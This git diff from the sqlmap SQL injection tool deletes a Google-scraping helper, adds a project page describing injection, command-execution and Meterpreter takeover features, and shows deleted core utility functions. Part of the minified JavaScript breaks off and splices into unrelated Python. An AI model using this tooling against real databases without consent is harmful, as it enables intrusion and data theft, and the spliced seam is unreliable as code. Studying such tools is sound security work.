b/extra/sqlharvest/__init__.py deleted file mode 100644 index c2e45792..00000000 --- a/extra/sqlharvest/__init__.py +++ /dev/null @@ -1,8 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -pass diff --git a/extra/sqlharvest/sqlharvest.py b/extra/sqlharvest/sqlharvest.py deleted file mode 100644 index 9391af1a..00000000 --- a/extra/sqlharvest/sqlharvest.py +++ /dev/null @@ -1,141 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -import cookielib -import re -import socket -import sys -import urllib -import urllib2 -import ConfigParser - -from operator import itemgetter - -TIMEOUT = 10 -CONFIG_FILE = 'sqlharvest.cfg' -TABLES_FILE = 'tables.txt' -USER_AGENT = 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; AskTB5.3)' -SEARCH_URL = 'http://www.google.com/m?source=mobileproducts&dc=gorganic' -MAX_FILE_SIZE = 2 * 1024 * 1024 # if a result (.sql) file for downloading is more than 2MB in size just skip it -QUERY = 'CREATE TABLE ext:sql' -REGEX_URLS = r';u=([^"]+?)&q=' -REGEX_RESULT = r'(?i)CREATE TABLE\s*(/\*.*\*/)?\s*(IF NOT EXISTS)?\s*(?P[^\(;]+)' - -def main(): - tables = dict() - cookies = cookielib.CookieJar() - cookie_processor = urllib2.HTTPCookieProcessor(cookies) - opener = urllib2.build_opener(cookie_processor) - opener.addheaders = [("User-Agent", USER_AGENT)] - - conn = opener.open(SEARCH_URL) - page = conn.read() # set initial cookie values - - config = ConfigParser.ConfigParser() - config.read(CONFIG_FILE) - - if not config.has_section("options"): - config.add_section("options") - if not config.has_option("options", "index"): - config.set("options", "index", "0") - - i = int(config.get("options", "index")) - - try: - with open(TABLES_FILE, 'r') as f: - for line in f.xreadlines(): - if len(line) > 0 and ',' in line: - temp = line.split(',') - tables[temp[0]] = int(temp[1]) - except: - pass - - socket.setdefaulttimeout(TIMEOUT) - - files, old_files = None, None - try: - while True: - abort = False - old_files = files - files = [] - - try: - conn = opener.open("%s&q=%s&start=%d&sa=N" % (SEARCH_URL, QUERY.replace(' ', '+'), i * 10)) - page = conn.read() - for match in re.finditer(REGEX_URLS, page): - files.append(urllib.unquote(match.group(1))) - if len(files) >= 10: - break - abort = (files == old_files) - - except KeyboardInterrupt: - raise - - except Exception, msg: - print msg - - if abort: - break - - sys.stdout.write("\n---------------\n") - sys.stdout.write("Result page #%d\n" % (i + 1)) - sys.stdout.write("---------------\n") - - for sqlfile in files: - print sqlfile - - try: - req = urllib2.Request(sqlfile) - response = urllib2.urlopen(req) - - if "Content-Length" in response.headers: - if int(response.headers.get("Content-Length")) > MAX_FILE_SIZE: - continue - - page = response.read() - found = False - counter = 0 - - for match in re.finditer(REGEX_RESULT, page): - counter += 1 - table = match.group("result").strip().strip("`\"'").replace('"."', ".").replace("].[", ".").strip('[]') - - if table and not any(_ in table for _ in ('>', '<', '--', ' ')): - found = True - sys.stdout.write('*') - - if table in tables: - tables[table] += 1 - else: - tables[table] = 1 - if found: - sys.stdout.write("\n") - - except KeyboardInterrupt: - raise - - except Exception, msg: - print msg - - else: - i += 1 - - except KeyboardInterrupt: - pass - - finally: - with open(TABLES_FILE, 'w+') as f: - tables = sorted(tables.items(), key=itemgetter(1), reverse=True) - for table, count in tables: - f.write("%s,%d\n" % (table, count)) - - config.set("options", "index", str(i + 1)) - with open(CONFIG_FILE, 'w+') as f: - config.write(f) - -if __name__ == "__main__": - main() diff --git a/favicon.ico b/favicon.ico new file mode 100644 index 00000000..75e92316 Binary files /dev/null and b/favicon.ico differ diff --git a/images/body-bg.jpg b/images/body-bg.jpg new file mode 100644 index 00000000..0e0f861b Binary files /dev/null and b/images/body-bg.jpg differ diff --git a/images/download-button-green.png b/images/download-button-green.png new file mode 100644 index 00000000..7e0625dc Binary files /dev/null and b/images/download-button-green.png differ diff --git a/images/download-button.png b/images/download-button.png new file mode 100644 index 00000000..df3f09a6 Binary files /dev/null and b/images/download-button.png differ diff --git a/images/github-button.png b/images/github-button.png new file mode 100644 index 00000000..efe07f9a Binary files /dev/null and b/images/github-button.png differ diff --git a/images/header-bg.jpg b/images/header-bg.jpg new file mode 100644 index 00000000..960bff75 Binary files /dev/null and b/images/header-bg.jpg differ diff --git a/images/highlight-bg.jpg b/images/highlight-bg.jpg new file mode 100644 index 00000000..4c4a78ef Binary files /dev/null and b/images/highlight-bg.jpg differ diff --git a/images/screenshot.png b/images/screenshot.png new file mode 100644 index 00000000..ecca7f9c Binary files /dev/null and b/images/screenshot.png differ diff --git a/images/sidebar-bg.jpg b/images/sidebar-bg.jpg new file mode 100644 index 00000000..42890fe7 Binary files /dev/null and b/images/sidebar-bg.jpg differ diff --git a/images/twitter.jpg b/images/twitter.jpg new file mode 100644 index 00000000..2a143fe6 Binary files /dev/null and b/images/twitter.jpg differ diff --git a/index.html b/index.html new file mode 100644 index 00000000..de78236b --- /dev/null +++ b/index.html @@ -0,0 +1,167 @@ + + + + + + + + + + + + + + + + + +sqlmap: automatic SQL injection and database takeover tool + + + +
+ +
+ +
+
+
+ + + +

Introduction

+ +

sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.

+ +
+ +

Features

+ +
    +
  • Full support for MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase, SAP MaxDB and HSQLDB database management systems.
  • +
  • Full support for six SQL injection techniques: boolean-based blind, time-based blind, error-based, UNION query-based, stacked queries and out-of-band.
  • +
  • Support to directly connect to the database without passing via a SQL injection, by providing DBMS credentials, IP address, port and database name.
  • +
  • Support to enumerate users, password hashes, privileges, roles, databases, tables and columns.
  • +
  • Automatic recognition of password hash formats and support for cracking them using a dictionary-based attack.
  • +
  • Support to dump database tables entirely, a range of entries or specific columns as per user's choice. The user can also choose to dump only a range of characters from each column's entry.
  • +
  • Support to search for specific database names, specific tables across all databases or specific columns across all databases' tables. This is useful, for instance, to identify tables containing custom application credentials where relevant columns' names contain string like name and pass.
  • +
  • Support to download and upload any file from the database server underlying file system when the database software is MySQL, PostgreSQL or Microsoft SQL Server.
  • +
  • Support to execute arbitrary commands and retrieve their standard output on the database server underlying operating system when the database software is MySQL, PostgreSQL or Microsoft SQL Server.
  • +
  • Support to establish an out-of-band stateful TCP connection between the attacker machine and the database server underlying operating system. This channel can be an interactive command prompt, a Meterpreter session or a graphical user interface (VNC) session as per user's choice.
  • +
  • Support for database process' user privilege escalation via Metasploit's Meterpreter getsystem command.
  • +
+ +

Refer to the wiki for an exhaustive breakdown of the features.

+ +

Download

+ +

You can download the latest zipball or tarball.

+

Preferably, you can download sqlmap by cloning the Git repository:

+
git clone https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
+ +

Documentation

+ + + +

Demo

+ +

+

Watch more demos here.

+ +

Communication

+ +

The sqlmap-users@lists.sourceforge.net mailing list is the preferred way to ask questions and discuss with other users, contributors and the developers.
+To subscribe use the online web form. It is also available via Gmane RSS feed. The archives are available online on Gmane.

+ +

Bug reports are welcome! Please report all bugs on the issue tracker or (alternatively) to the mailing list.

+ +

Contribute

+ +

All code contributions are greatly appreciated. First off, clone the Git repository, read the user's manual carefully, go through the code yourself and drop us an email if you are having a hard time grasping its structure and meaning.

+

Our preferred method of patch submission is via a Git pull request.

+

Each patch should make one logical change. Please follow the existing stylistic conventions: wrap code to 76 columns when possible. Avoid tabs, use four space characters instead. Before you put time into a non-trivial patch, it is worth discussing it on the mailing list or privately by email.

+

Many people have contributed in different ways to the sqlmap development. You can be the next!

+ +

Donate

+ +

sqlmap is the result of numerous hours of passionated work from a small team of computer security enthusiasts. If you appreciated our work and you want to see sqlmap kept being developed, please consider making a donation to our efforts via PayPal to donations@sqlmap.org. We also accept Ƀitcoins to 1AUrrKYsamBEThdruYTQmUfMfLF7aaxU6x.

+ +

License

+ +

Copyright © 2006-2016 by Bernardo Damele Assumpcao Guimaraes and Miroslav Stampar. All rights reserved.

+ +

This program is free software; you may redistribute and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; Version 2 (or later) with the clarifications and exceptions described in the license file. This guarantees your right to use, modify, and redistribute this software under certain conditions. If you wish to embed sqlmap technology into proprietary software, we sell alternative licenses +(contact sales@sqlmap.org).

+ +

Disclaimer

+ +

This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License v2.0 for more details at http://www.gnu.org/licenses/gpl-2.0.html.

+ +

Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program.

+ +

Developers

+ + + +

You can contact the development team by writing to dev@sqlmap.org.

+
+ + +
+
+ + + + + + diff --git a/javascripts/main.js b/javascripts/main.js new file mode 100644 index 00000000..d8135d37 --- /dev/null +++ b/javascripts/main.js @@ -0,0 +1 @@ +console.log('This would be the main JS file.'); diff --git a/javascripts/twitter.min.js b/javascripts/twitter.min.js new file mode 100644 index 00000000..37727348 --- /dev/null +++ b/javascripts/twitter.min.js @@ -0,0 +1,19 @@ +/*** + * Twitter JS v1.13.3 + * http://code.google.com/p/twitterjs/ + * Copyright (c) 2009 Remy Sharp / MIT License + * $Date$ + */ + /* + MIT (MIT-LICENSE.txt) + */ + typeof renderTwitters!="function"&&function(){function v(a){var c;for(c in a.user)a["user_"+c]=a.user[c];a.time=s(a.created_at);return a}function w(a){t?a.call():u.push(a)}function q(){t=true;for(var a;a=u.shift();)a.call()}function x(){if(document.addEventListener&&!r.webkit)document.addEventListener("DOMContentLoaded",q,false);else if(r.msie){document.write("||%s" % (r"|<[^>]+>|\t|\n|\r" if onlyText else ""), " ", page) - while retVal.find(" ") != -1: - retVal = retVal.replace(" ", " ") - retVal = htmlunescape(retVal.strip()) - - return retVal - -def getPageWordSet(page): - """ - Returns word set used in page content - - >>> sorted(getPageWordSet(u'foobartest')) - [u'foobar', u'test'] - """ - - retVal = set() - - # only if the page's charset has been successfully identified - if isinstance(page, unicode): - _ = getFilteredPageContent(page) - retVal = set(re.findall(r"\w+", _)) - - return retVal - -def showStaticWords(firstPage, secondPage): - """ - Prints words appearing in two different response pages - """ - - infoMsg = "finding static words in longest matching part of dynamic page content" - logger.info(infoMsg) - - firstPage = getFilteredPageContent(firstPage) - secondPage = getFilteredPageContent(secondPage) - - infoMsg = "static words: " - - if firstPage and secondPage: - match = SequenceMatcher(None, firstPage, secondPage).find_longest_match(0, len(firstPage), 0, len(secondPage)) - commonText = firstPage[match[0]:match[0] + match[2]] - commonWords = getPageWordSet(commonText) - else: - commonWords = None - - if commonWords: - commonWords = list(commonWords) - commonWords.sort(lambda a, b: cmp(a.lower(), b.lower())) - - for word in commonWords: - if len(word) > 2: - infoMsg += "'%s', " % word - - infoMsg = infoMsg.rstrip(", ") - else: - infoMsg += "None" - - logger.info(infoMsg) - -def isWindowsDriveLetterPath(filepath): - """ - Returns True if given filepath starts with a Windows drive letter - - >>> isWindowsDriveLetterPath('C:\\boot.ini') - True - >>> isWindowsDriveLetterPath('/var/log/apache.log') - False - """ - - return re.search("\A[\w]\:", filepath) is not None - -def posixToNtSlashes(filepath): - """ - Replaces all occurances of Posix slashes (/) in provided - filepath with NT ones (\) - - >>> posixToNtSlashes('C:/Windows') - 'C:\\\\Windows' - """ - - return filepath.replace('/', '\\') if filepath else filepath - -def ntToPosixSlashes(filepath): - """ - Replaces all occurances of NT slashes (\) in provided - filepath with Posix ones (/) - - >>> ntToPosixSlashes('C:\\Windows') - 'C:/Windows' - """ - - return filepath.replace('\\', '/') if filepath else filepath - -def isHexEncodedString(subject): - """ - Checks if the provided string is hex encoded - - >>> isHexEncodedString('DEADBEEF') - True - >>> isHexEncodedString('test') - False - """ - - return re.match(r"\A[0-9a-fA-Fx]+\Z", subject) is not None - -@cachedmethod -def getConsoleWidth(default=80): - """ - Returns console width - """ - - width = None - - if os.getenv("COLUMNS", "").isdigit(): - width = int(os.getenv("COLUMNS")) - else: - try: - try: - FNULL = open(os.devnull, 'w') - except IOError: - FNULL = None - process = execute("stty size", shell=True, stdout=PIPE, stderr=FNULL or PIPE) - stdout, _ = process.communicate() - items = stdout.split() - - if len(items) == 2 and items[1].isdigit(): - width = int(items[1]) - except (OSError, MemoryError): - pass - - if width is None: - try: - import curses - - stdscr = curses.initscr() - _, width = stdscr.getmaxyx() - curses.endwin() - except: - pass - - return width or default - -def clearConsoleLine(forceOutput=False): - """ - Clears current console line - """ - - if getattr(LOGGER_HANDLER, "is_tty", False): - dataToStdout("\r%s\r" % (" " * (getConsoleWidth() - 1)), forceOutput) - - kb.prependFlag = False - kb.stickyLevel = None - -def parseXmlFile(xmlFile, handler): - """ - Parses XML file by a given handler - """ - - try: - with contextlib.closing(StringIO(readCachedFileContent(xmlFile))) as stream: - parse(stream, handler) - except (SAXParseException, UnicodeError), ex: - errMsg = "something seems to be wrong with " - errMsg += "the file '%s' ('%s'). Please make " % (xmlFile, getSafeExString(ex)) - errMsg += "sure that you haven't made any changes to it" - raise SqlmapInstallationException, errMsg - -def getSQLSnippet(dbms, sfile, **variables): - """ - Returns content of SQL snippet located inside 'procs/' directory - """ - - if sfile.endswith('.sql') and os.path.exists(sfile): - filename = sfile - elif not sfile.endswith('.sql') and os.path.exists("%s.sql" % sfile): - filename = "%s.sql" % sfile - else: - filename = os.path.join(paths.SQLMAP_PROCS_PATH, DBMS_DIRECTORY_DICT[dbms], sfile if sfile.endswith('.sql') else "%s.sql" % sfile) - checkFile(filename) - - retVal = readCachedFileContent(filename) - retVal = re.sub(r"#.+", "", retVal) - retVal = re.sub(r"(?s);\s+", "; ", retVal).strip("\r\n") - - for _ in variables.keys(): - retVal = re.sub(r"%%%s%%" % _, variables[_], retVal) - - for _ in re.findall(r"%RANDSTR\d+%", retVal, re.I): - retVal = retVal.replace(_, randomStr()) - - for _ in re.findall(r"%RANDINT\d+%", retVal, re.I): - retVal = retVal.replace(_, randomInt()) - - variables = re.findall(r"(? 1 else "", ", ".join(variables), sfile) - logger.error(errMsg) - - msg = "do you want to provide the substitution values? [y/N] " - choice = readInput(msg, default="N") - - if choice and choice[0].lower() == "y": - for var in variables: - msg = "insert value for variable '%s': " % var - val = readInput(msg, default="") - retVal = retVal.replace(r"%%%s%%" % var, val) - - return retVal - -def readCachedFileContent(filename, mode='rb'): - """ - Cached reading of file content (avoiding multiple same file reading) - """ - - if filename not in kb.cache.content: - with kb.locks.cache: - if filename not in kb.cache.content: - checkFile(filename) - try: - with openFile(filename, mode) as f: - kb.cache.content[filename] = f.read() - except (IOError, OSError, MemoryError), ex: - errMsg = "something went wrong while trying " - errMsg += "to read the content of file '%s' ('%s')" % (filename, getSafeExString(ex)) - raise SqlmapSystemException(errMsg) - - return kb.cache.content[filename] - -def readXmlFile(xmlFile): - """ - Reads XML file content and returns its DOM representation - """ - - checkFile(xmlFile) - retVal = minidom.parse(xmlFile).documentElement - - return retVal - -def stdev(values): - """ - Computes standard deviation of a list of numbers. - Reference: http://www.goldb.org/corestats.html - - >>> stdev([0.9, 0.9, 0.9, 1.0, 0.8, 0.9]) - 0.06324555320336757 - """ - - if not values or len(values) < 2: - return None - - key = (values[0], values[-1], len(values)) - - if kb.get("cache") and key in kb.cache.stdev: - retVal = kb.cache.stdev[key] - else: - avg = average(values) - _ = reduce(lambda x, y: x + pow((y or 0) - avg, 2), values, 0.0) - retVal = sqrt(_ / (len(values) - 1)) - if kb.get("cache"): - kb.cache.stdev[key] = retVal - - return retVal - -def average(values): - """ - Computes the arithmetic mean of a list of numbers. - - >>> average([0.9, 0.9, 0.9, 1.0, 0.8, 0.9]) - 0.9 - """ - - return (sum(values) / len(values)) if values else None - -def calculateDeltaSeconds(start): - """ - Returns elapsed time from start till now - """ - - return time.time() - start - -def initCommonOutputs(): - """ - Initializes dictionary containing common output values used by "good samaritan" feature - """ - - kb.commonOutputs = {} - key = None - - with openFile(paths.COMMON_OUTPUTS, 'r') as f: - for line in f.readlines(): # xreadlines doesn't return unicode strings when codec.open() is used - if line.find('#') != -1: - line = line[:line.find('#')] - - line = line.strip() - - if len(line) > 1: - if line.startswith('[') and line.endswith(']'): - key = line[1:-1] - elif key: - if key not in kb.commonOutputs: - kb.commonOutputs[key] = set() - - if line not in kb.commonOutputs[key]: - kb.commonOutputs[key].add(line) - -def getFileItems(filename, commentPrefix='#', unicode_=True, lowercase=False, unique=False): - """ - Returns newline delimited items contained inside file - """ - - retVal = list() if not unique else OrderedDict() - - checkFile(filename) - - try: - with openFile(filename, 'r', errors="ignore") if unicode_ else open(filename, 'r') as f: - for line in (f.readlines() if unicode_ else f.xreadlines()): # xreadlines doesn't return unicode strings when codec.open() is used - if commentPrefix: - if line.find(commentPrefix) != -1: - line = line[:line.find(commentPrefix)] - - line = line.strip() - - if not unicode_: - try: - line = str.encode(line) - except UnicodeDecodeError: - continue - - if line: - if lowercase: - line = line.lower() - - if unique and line in retVal: - continue - - if unique: - retVal[line] = True - else: - retVal.append(line) - except (IOError, OSError, MemoryError), ex: - errMsg = "something went wrong while trying " - errMsg += "to read the content of file '%s' ('%s')" % (filename, getSafeExString(ex)) - raise SqlmapSystemException(errMsg) - - return retVal if not unique else retVal.keys() - -def goGoodSamaritan(prevValue, originalCharset): - """ - Function for retrieving parameters needed for common prediction (good - samaritan) feature. - - prevValue: retrieved query output so far (e.g. 'i'). - - Returns commonValue if there is a complete single match (in kb.partRun - of txt/common-outputs.txt under kb.partRun) regarding parameter - prevValue. If there is no single value match, but multiple, commonCharset is - returned containing more probable characters (retrieved from matched - values in txt/common-outputs.txt) together with the rest of charset as - otherCharset. - """ - - if kb.commonOutputs is None: - initCommonOutputs() - - predictionSet = set() - commonValue = None - commonPattern = None - countCommonValue = 0 - - # If the header (e.g. Databases) we are looking for has common - # outputs defined - if kb.partRun in kb.commonOutputs: - commonPartOutputs = kb.commonOutputs[kb.partRun] - commonPattern = commonFinderOnly(prevValue, commonPartOutputs) - - # If the longest common prefix is the same as previous value then - # do not consider it - if commonPattern and commonPattern == prevValue: - commonPattern = None - - # For each common output - for item in commonPartOutputs: - # Check if the common output (item) starts with prevValue - # where prevValue is the enumerated character(s) so far - if item.startswith(prevValue): - commonValue = item - countCommonValue += 1 - - if len(item) > len(prevValue): - char = item[len(prevValue)] - predictionSet.add(char) - - # Reset single value if there is more than one possible common - # output - if countCommonValue > 1: - commonValue = None - - commonCharset = [] - otherCharset = [] - - # Split the original charset into common chars (commonCharset) - # and other chars (otherCharset) - for ordChar in originalCharset: - if chr(ordChar) not in predictionSet: - otherCharset.append(ordChar) - else: - commonCharset.append(ordChar) - - commonCharset.sort() - - return commonValue, commonPattern, commonCharset, originalCharset - else: - return None, None, None, originalCharset - -def getPartRun(alias=True): - """ - Goes through call stack and finds constructs matching conf.dbmsHandler.*. - Returns it or its alias used in txt/common-outputs.txt - """ - - retVal = None - commonPartsDict = optDict["Enumeration"] - - try: - stack = [item[4][0] if isinstance(item[4], list) else '' for item in inspect.stack()] - - # Goes backwards through the stack to find the conf.dbmsHandler method - # calling this function - for i in xrange(0, len(stack) - 1): - for regex in (r"self\.(get[^(]+)\(\)", r"conf\.dbmsHandler\.([^(]+)\(\)"): - match = re.search(regex, stack[i]) - - if match: - # This is the calling conf.dbmsHandler or self method - # (e.g. 'getDbms') - retVal = match.groups()[0] - break - - if retVal is not None: - break - - # Reference: http://coding.derkeiler.com/Archive/Python/comp.lang.python/2004-06/2267.html - except TypeError: - pass - - # Return the INI tag to consider for common outputs (e.g. 'Databases') - if alias: - return commonPartsDict[retVal][1] if isinstance(commonPartsDict.get(retVal), tuple) else retVal - else: - return retVal - -def getUnicode(value, encoding=None, noneToNull=False): - """ - Return the unicode representation of the supplied value: - - >>> getUnicode(u'test') - u'test' - >>> getUnicode('test') - u'test' - >>> getUnicode(1) - u'1' - """ - - if noneToNull and value is None: - return NULL - - if isListLike(value): - value = list(getUnicode(_, encoding, noneToNull) for _ in value) - return value - - if isinstance(value, unicode): - return value - elif isinstance(value, basestring): - while True: - try: - return unicode(value, encoding or (kb.get("pageEncoding") if kb.get("originalPage") else None) or UNICODE_ENCODING) - except UnicodeDecodeError, ex: - try: - return unicode(value, UNICODE_ENCODING) - except: - value = value[:ex.start] + "".join(INVALID_UNICODE_CHAR_FORMAT % ord(_) for _ in value[ex.start:ex.end]) + value[ex.end:] - else: - try: - return unicode(value) - except UnicodeDecodeError: - return unicode(str(value), errors="ignore") # encoding ignored for non-basestring instances - -def longestCommonPrefix(*sequences): - """ - Returns longest common prefix occuring in given sequences - Reference: http://boredzo.org/blog/archives/2007-01-06/longest-common-prefix-in-python-2 - - >>> longestCommonPrefix('foobar', 'fobar') - 'fo' - """ - - if len(sequences) == 1: - return sequences[0] - - sequences = [pair[1] for pair in sorted((len(fi), fi) for fi in sequences)] - - if not sequences: - return None - - for i, comparison_ch in enumerate(sequences[0]): - for fi in sequences[1:]: - ch = fi[i] - - if ch != comparison_ch: - return fi[:i] - - return sequences[0] - -def commonFinderOnly(initial, sequence): - return longestCommonPrefix(*filter(lambda x: x.startswith(initial), sequence)) - -def pushValue(value): - """ - Push value to the stack (thread dependent) - """ - - getCurrentThreadData().valueStack.append(copy.deepcopy(value)) - -def popValue(): - """ - Pop value from the stack (thread dependent) - - >>> pushValue('foobar') - >>> popValue() - 'foobar' - """ - - return getCurrentThreadData().valueStack.pop() - -def wasLastResponseDBMSError(): - """ - Returns True if the last web request resulted in a (recognized) DBMS error page - """ - - threadData = getCurrentThreadData() - return threadData.lastErrorPage and threadData.lastErrorPage[0] == threadData.lastRequestUID - -def wasLastResponseHTTPError(): - """ - Returns True if the last web request resulted in an errornous HTTP code (like 500) - """ - - threadData = getCurrentThreadData() - return threadData.lastHTTPError and threadData.lastHTTPError[0] == threadData.lastRequestUID - -def wasLastResponseDelayed(): - """ - Returns True if the last web request resulted in a time-delay - """ - - # 99.9999999997440% of all non time-based SQL injection affected - # response times should be inside +-7*stdev([normal response times]) - # Math reference: http://www.answers.com/topic/standard-deviation - - deviation = stdev(kb.responseTimes.get(kb.responseTimeMode, [])) - threadData = getCurrentThreadData() - - if deviation and not conf.direct: - if len(kb.responseTimes[kb.responseTimeMode]) < MIN_TIME_RESPONSES: - warnMsg = "time-based standard deviation method used on a model " - warnMsg += "with less than %d response times" % MIN_TIME_RESPONSES - logger.warn(warnMsg) - - lowerStdLimit = average(kb.responseTimes[kb.responseTimeMode]) + TIME_STDEV_COEFF * deviation - retVal = (threadData.lastQueryDuration >= max(MIN_VALID_DELAYED_RESPONSE, lowerStdLimit)) - - if not kb.testMode and retVal: - if kb.adjustTimeDelay is None: - msg = "do you want sqlmap to try to optimize value(s) " - msg += "for DBMS delay responses (option '--time-sec')? [Y/n] " - choice = readInput(msg, default='Y') - kb.adjustTimeDelay = ADJUST_TIME_DELAY.DISABLE if choice.upper() == 'N' else ADJUST_TIME_DELAY.YES - if kb.adjustTimeDelay is ADJUST_TIME_DELAY.YES: - adjustTimeDelay(threadData.lastQueryDuration, lowerStdLimit) - - return retVal - else: - return (threadData.lastQueryDuration - conf.timeSec) >= 0 - -def adjustTimeDelay(lastQueryDuration, lowerStdLimit): - """ - Provides tip for adjusting time delay in time-based data retrieval - """ - - candidate = 1 + int(round(lowerStdLimit)) - - if candidate: - kb.delayCandidates = [candidate] + kb.delayCandidates[:-1] - - if all((x == candidate for x in kb.delayCandidates)) and candidate < conf.timeSec: - conf.timeSec = candidate - - infoMsg = "adjusting time delay to " - infoMsg += "%d second%s due to good response times" % (conf.timeSec, 's' if conf.timeSec > 1 else '') - logger.info(infoMsg) - -def getLastRequestHTTPError(): - """ - Returns last HTTP error code - """ - - threadData = getCurrentThreadData() - return threadData.lastHTTPError[1] if threadData.lastHTTPError else None - -def extractErrorMessage(page): - """ - Returns reported error message from page if it founds one - - >>> extractErrorMessage(u'Test\\nWarning: oci_parse() [function.oci-parse]: ORA-01756: quoted string not properly terminated

Only a test page

') - u'oci_parse() [function.oci-parse]: ORA-01756: quoted string not properly terminated' - """ - - retVal = None - - if isinstance(page, basestring): - for regex in ERROR_PARSING_REGEXES: - match = re.search(regex, page, re.DOTALL | re.IGNORECASE) - - if match: - retVal = htmlunescape(match.group("result")).replace("
", "\n").strip() - break - - return retVal - -def findMultipartPostBoundary(post): - """ - Finds value for a boundary parameter in given multipart POST body - """ - - retVal = None - - done = set() - candidates = [] - - for match in re.finditer(r"(?m)^--(.+?)(--)?$", post or ""): - _ = match.group(1).strip().strip('-') - - if _ in done: - continue - else: - candidates.append((post.count(_), _)) - done.add(_) - - if candidates: - candidates.sort(key=lambda _: _[0], reverse=True) - retVal = candidates[0][1] - - return retVal - -def urldecode(value, encoding=None, unsafe="%%&=;+%s" % CUSTOM_INJECTION_MARK_CHAR, convall=False, plusspace=True): - """ - URL decodes given value - - >>> urldecode('AND%201%3E%282%2B3%29%23', convall=True) - u'AND 1>(2+3)#' - """ - - result = value - - if value: - try: - # for cases like T%C3%BCrk%C3%A7e - value = str(value) - except ValueError: - pass - finally: - if convall: - result = urllib.unquote_plus(value) if plusspace else urllib.unquote(value) - else: - def _(match): - charset = reduce(lambda x, y: x.replace(y, ""), unsafe, string.printable) - char = chr(ord(match.group(1).decode("hex"))) - return char if char in charset else match.group(0) - result = value - if plusspace: - result = result.replace("+", " ") # plus sign has a special meaning in URL encoded data (hence the usage of urllib.unquote_plus in convall case) - result = re.sub("%([0-9a-fA-F]{2})", _, result) - - if isinstance(result, str): - result = unicode(result, encoding or UNICODE_ENCODING, "replace") - - return result - -def urlencode(value, safe="%&=-_", convall=False, limit=False, spaceplus=False): - """ - URL encodes given value - - >>> urlencode('AND 1>(2+3)#') - 'AND%201%3E%282%2B3%29%23' - """ - - if conf.get("direct"): - return value - - count = 0 - result = None if value is None else "" - - if value: - if Backend.isDbms(DBMS.MSSQL) and not kb.tamperFunctions and any(ord(_) > 255 for _ in value): - warnMsg = "if you experience problems with " - warnMsg += "non-ASCII identifier names " - warnMsg += "you are advised to rerun with '--tamper=charunicodeencode'" - singleTimeWarnMessage(warnMsg) - - if convall or safe is None: - safe = "" - - # corner case when character % really needs to be - # encoded (when not representing URL encoded char) - # except in cases when tampering scripts are used - if all(map(lambda x: '%' in x, [safe, value])) and not kb.tamperFunctions: - value = re.sub("%(?![0-9a-fA-F]{2})", "%25", value) - - while True: - result = urllib.quote(utf8encode(value), safe) - - if limit and len(result) > URLENCODE_CHAR_LIMIT: - if count >= len(URLENCODE_FAILSAFE_CHARS): - break - - while count < len(URLENCODE_FAILSAFE_CHARS): - safe += URLENCODE_FAILSAFE_CHARS[count] - count += 1 - if safe[-1] in value: - break - else: - break - - if spaceplus: - result = result.replace(urllib.quote(' '), '+') - - return result - -def runningAsAdmin(): - """ - Returns True if the current process is run under admin privileges - """ - - isAdmin = None - - if PLATFORM in ("posix", "mac"): - _ = os.geteuid() - - isAdmin = isinstance(_, (int, float, long)) and _ == 0 - elif IS_WIN: - import ctypes - - _ = ctypes.windll.shell32.IsUserAnAdmin() - - isAdmin = isinstance(_, (int, float, long)) and _ == 1 - else: - errMsg = "sqlmap is not able to check if you are running it " - errMsg += "as an administrator account on this platform. " - errMsg += "sqlmap will assume that you are an administrator " - errMsg += "which is mandatory for the requested takeover attack " - errMsg += "to work properly" - logger.error(errMsg) - - isAdmin = True - - return isAdmin - -def logHTTPTraffic(requestLogMsg, responseLogMsg): - """ - Logs HTTP traffic to the output file - """ - - if not conf.trafficFile: - return - - with kb.locks.log: - dataToTrafficFile("%s%s" % (requestLogMsg, os.linesep)) - dataToTrafficFile("%s%s" % (responseLogMsg, os.linesep)) - dataToTrafficFile("%s%s%s%s" % (os.linesep, 76 * '#', os.linesep, os.linesep)) - -def getPageTemplate(payload, place): # Cross-linked function - raise NotImplementedError - -def getPublicTypeMembers(type_, onlyValues=False): - """ - Useful for getting members from types (e.g. in enums) - - >>> [_ for _ in getPublicTypeMembers(OS, True)] - ['Linux', 'Windows'] - """ - - for name, value in inspect.getmembers(type_): - if not name.startswith('__'): - if not onlyValues: - yield (name, value) - else: - yield value - -def enumValueToNameLookup(type_, value_): - """ - Returns name of a enum member with a given value - - >>> enumValueToNameLookup(SORT_ORDER, 100) - 'LAST' - """ - - retVal = None - - for name, value in getPublicTypeMembers(type_): - if value == value_: - retVal = name - break - - return retVal - -def extractRegexResult(regex, content, flags=0): - """ - Returns 'result' group value from a possible match with regex on a given - content - - >>> extractRegexResult(r'a(?P[^g]+)g', 'abcdefg') - 'bcdef' - """ - - retVal = None - - if regex and content and "?P" in regex: - match = re.search(regex, content, flags) - - if match: - retVal = match.group("result") - - return retVal - -def extractTextTagContent(page): - """ - Returns list containing content from "textual" tags - - >>> extractTextTagContent(u'Title
foobar
